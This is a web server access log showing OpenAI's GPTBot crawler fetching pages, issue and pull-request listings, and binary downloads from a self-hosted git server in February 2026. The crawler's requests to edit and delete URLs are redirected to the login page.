"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11197] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" -[17/Feb/2026:18:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" -[17/Feb/2026:18:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15265] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:18:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:18:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" -[17/Feb/2026:18:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:18:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:18:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] 